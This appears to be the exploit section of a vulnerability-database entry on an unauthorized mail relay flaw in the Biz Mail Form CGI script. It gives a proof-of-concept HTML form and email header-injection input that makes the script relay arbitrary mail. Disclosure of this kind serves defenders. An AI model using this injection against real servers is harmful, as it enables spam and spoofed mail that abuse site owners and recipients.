• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Biz Mail Form Unauthorized Mail Relay Vulnerability

An exploit is not required.

The following proof of concept is available:

Place the following into an HTML file:
<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></TEXTAREA>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>

In the textbox that pops up, enter in the following (begin by hitting
enter to insert a blank line)

From:email@example.com
To:yourvalidemail@yourdomain.com
Subject:Exploit Test

This is a test

Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.